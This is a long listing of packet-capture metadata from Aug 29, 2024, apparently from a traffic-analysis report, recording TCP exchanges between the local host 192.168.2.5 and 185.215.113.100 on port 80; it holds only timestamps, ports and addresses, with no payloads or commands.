Aug 29, 2024 15:42:50.293088913 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.293104887 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.293121099 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.293123960 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.293138981 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.293138981 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.293163061 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.293164015 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.293183088 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.293190956 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.293235064 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.293246031 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.293262005 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.293298006 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.293313980 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.293318033 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.293318033 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.293338060 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.293368101 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.294620991 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.294637918 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.294656038 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.294692039 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.294692039 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.294708967 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.294739962 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.294755936 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.294771910 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.294786930 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.294789076 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.294809103 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.294862986 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.294889927 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.294899940 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.294914961 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.294939041 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.294959068 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.294959068 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.294959068 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.294975996 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.294991970 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.294992924 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.295003891 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.295011044 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.295027971 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.295034885 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.295034885 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.295044899 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.295056105 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.295133114 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.295205116 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.295218945 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.295237064 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.295254946 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.295260906 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.295281887 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.295325041 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.295360088 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.295375109 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.295388937 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.295403957 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.295419931 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.295422077 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.295442104 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.295464039 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.295506954 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.295542955 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.295557976 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.295564890 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.295574903 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.295591116 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.295602083 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.295602083 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.295608997 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.295615911 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.295631886 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.295649052 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.295649052 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.295649052 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.295684099 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.295684099 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.295696974 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.295713902 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.295727968 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.295743942 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.295756102 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.295756102 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.295775890 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.295785904 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.319264889 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.319278955 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.319308996 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.319324970 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.319339991 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.319340944 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.319340944 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.319364071 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.319410086 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.319425106 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.319426060 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.319442987 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.319457054 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.319478989 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.319494009 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.377161980 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.377188921 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.377202988 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.377238035 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.377263069 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.377268076 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.377285957 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.377302885 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.377315998 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.377321005 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.377340078 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.377353907 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.377363920 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.377377033 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.377413034 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.377446890 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.377506971 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.377522945 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.377538919 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.377553940 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.377582073 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.377582073 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.377594948 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.377666950 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.377686977 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.377712965 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.377728939 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.377734900 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.377734900 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.377746105 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.377775908 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.377777100 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.377791882 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.377794981 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.377810001 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.377832890 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.377846003 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.377867937 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.377867937 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.377883911 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.377898932 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.377912998 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.377929926 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.377931118 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.377944946 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.377958059 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.377958059 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.377962112 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.377978086 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.377990007 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.377990007 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.378029108 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.378029108 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.378364086 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.378377914 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.378392935 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.378407001 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.378429890 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.378429890 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.378454924 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.378458977 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.378496885 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.378505945 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.378513098 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.378537893 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.378556967 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.378556967 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.378578901 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.378588915 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.378613949 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.378631115 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.378653049 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.378654003 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.378674984 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.378735065 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.378753901 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.378771067 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.378791094 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.378813982 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.378813982 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.379319906 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.379333973 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.379359007 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.379374027 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.379375935 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.379390001 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.379420042 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.379420042 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.379447937 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.379463911 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.379479885 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.379497051 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.379513025 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.379520893 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.379520893 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.379573107 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.379590034 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.379606009 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.379651070 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.379694939 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.379744053 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.379767895 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.379782915 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.379798889 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.379801989 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.379801989 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.379817963 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.379833937 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.379836082 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.379842997 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.379857063 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.379875898 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.379875898 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.379878044 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.379898071 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.379926920 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.380002022 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.380017042 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.380033016 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.380048037 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.380048037 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.380064964 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.380068064 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.380081892 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.380084991 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.380096912 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.380099058 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.380114079 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.380127907 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.380131960 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.380170107 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.380170107 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.380172968 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.380191088 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.380203962 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.380230904 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.380230904 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.380244970 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.380310059 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.380326986 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.380341053 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.380358934 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.380376101 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.380376101 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.380407095 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.380436897 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.380451918 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.380466938 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.380498886 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.380508900 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.380536079 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.380562067 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.380578995 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.380597115 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.380630016 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.380630970 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.380666018 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.380681038 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.380697966 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.380712032 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.380724907 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.380732059 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.380732059 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.380742073 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.380745888 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.380798101 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.380798101 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.438186884 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.438215017 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.438230038 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.438311100 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.438311100 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.438378096 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.438395023 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.438410044 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.438433886 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.438487053 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.438502073 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.438509941 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.438518047 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.438534021 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.438561916 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.438606977 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.438621044 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.438688040 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.438707113 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.438723087 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.438745022 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.438772917 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.438776016 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.438791037 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.438807964 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.438810110 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.438822031 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.438844919 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.438854933 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.438868999 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.438883066 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.438885927 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.438898087 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.438906908 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.438910961 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.438931942 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.438950062 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.438950062 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.438950062 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.438962936 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.438978910 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.438990116 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.438990116 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.438994884 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.439013004 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.439014912 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.439027071 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.439050913 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.439054012 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.439063072 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.439069986 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.439085960 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.439126968 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.439141035 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.439147949 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.439157963 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.439173937 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.439189911 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.439199924 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.439199924 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.439215899 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.439228058 CEST	49704	80	192.168.2.5	185.215.113.100
